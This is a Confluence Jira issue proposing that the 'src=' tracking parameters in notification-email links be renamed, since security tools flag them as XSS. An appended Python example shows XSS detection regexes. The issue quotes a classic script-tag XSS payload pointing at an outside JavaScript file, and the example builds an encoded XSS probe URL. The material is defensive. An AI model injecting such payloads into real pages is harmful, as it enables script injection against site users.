Confluence Data Center / CONFSERVER-74327

Replacing "src=" from the links that are created for email notifications


We collect Confluence feedback from various sources, and we evaluate what we've collected when planning our product roadmap. To understand how this piece of feedback will be reviewed, see our Implementation of New Features Policy.

If a user uses a link from an e-mail to navigate to Confluence, the URL looks like the one below:

    https://confluence.example.com/pages/viewpage.action?pageId=123456&preview=example.pptx&src=mail&src.mail.product=confluence-server&src.mail.timestamp=160612345679&src.mail.notification=com.atlassian.confluence.plugins.confluence-file-notifications%3Afile-content-update-notification&src.mail.recipient=XYZWe&src.mail.action=view

The src= part of the URL creates false-positive XSS alerts in security systems, as XSS attacks can include strings like this in URLs:

    <script src=http://ha.ckers.org/xss.js></script>

So replacing src= with something like utm_source (or utm_medium, etc.), which is used for the same purpose but is considered safe and is a technical standard for tracking requests, would be better from a security point of view.
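The behaviour described in this issue, as an added example that is not part of the issue or of Confluence's code: a Python script that reproduces the false positive with a naive "src=" substring signature over the decoded request URL, applies the proposed parameter rename, and contrasts it with a context-aware check that inspects decoded parameter values for tag markup and therefore never fires on a parameter name. The utm_mail_* names, both signatures and the XSS probe URL are constructed for the example; only the tracking link is taken from the issue.

```python
"""Added example (not from the Jira issue or Confluence's code base).

Reproduces the false positive described in CONFSERVER-74327 with a naive
"src=" signature, applies the proposed parameter rename, and shows a
context-aware check that inspects decoded parameter values instead of the
raw request line. All URLs, signatures and utm_* names are constructed here.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit, unquote

# Constructed input 1: the e-mail tracking link quoted in the issue.
MAIL_LINK = (
    "https://confluence.example.com/pages/viewpage.action?pageId=123456"
    "&preview=example.pptx&src=mail&src.mail.product=confluence-server"
    "&src.mail.timestamp=160612345679"
    "&src.mail.notification=com.atlassian.confluence.plugins."
    "confluence-file-notifications%3Afile-content-update-notification"
    "&src.mail.recipient=XYZWe&src.mail.action=view"
)

# Constructed input 2: a reflected-XSS probe carrying the classic
# <script src=...></script> payload, URL-encoded, in the preview parameter.
XSS_PROBE = (
    "https://confluence.example.com/pages/viewpage.action?pageId=123456"
    "&preview=%3Cscript%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E"
)

# The kind of signature that causes the false positive: a bare substring
# match for "src=" over the percent-decoded request line.
NAIVE_SIGNATURE = re.compile(r"src\s*=", re.IGNORECASE)

# A context-aware signature: only markup a browser would parse as a tag
# (<script ...> or any tag carrying a src attribute) counts.
CONTEXT_SIGNATURE = re.compile(r"<\s*script\b|<\s*\w+[^>]*\bsrc\s*=", re.IGNORECASE)


def naive_alert(url: str) -> bool:
    """True if the substring signature fires on the decoded URL (name or value)."""
    return NAIVE_SIGNATURE.search(unquote(url)) is not None


def rename_tracking_params(url: str) -> str:
    """Hypothetical implementation of the issue's proposal.

    Renames src -> utm_source and src.mail.<field> -> utm_mail_<field>,
    leaving every other parameter and its value untouched. This illustrates
    the suggestion; it is not what Confluence does.
    """
    parts = urlsplit(url)
    renamed = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "src":
            key = "utm_source"
        elif key.startswith("src.mail."):
            key = "utm_mail_" + key[len("src.mail."):]
        renamed.append((key, value))
    return urlunsplit(parts._replace(query=urlencode(renamed)))


def context_aware_alert(url: str) -> bool:
    """True only when a decoded parameter *value* contains tag markup.

    Parameter names are never inspected, so the name src, or a value such
    as "mail", cannot trigger the rule on its own.
    """
    values = [v for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return any(CONTEXT_SIGNATURE.search(v) for v in values)


if __name__ == "__main__":
    for label, url in (("mail link", MAIL_LINK),
                       ("renamed mail link", rename_tracking_params(MAIL_LINK)),
                       ("xss probe", XSS_PROBE)):
        print(f"{label:18s} naive={naive_alert(url)!s:5s} "
              f"context={context_aware_alert(url)}")
```

Running it shows the naive rule firing on both the legitimate mail link and the probe, going quiet on the renamed link, while the context-aware rule separates the two without any rename. The rename is a workaround for detectors that match parameter names; a rule that decodes the query and inspects values individually fixes the false positive at its source.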

Assignee: Unassigned
Reporter: Basar Beykoz (Inactive)
Votes: 1
Watchers: 1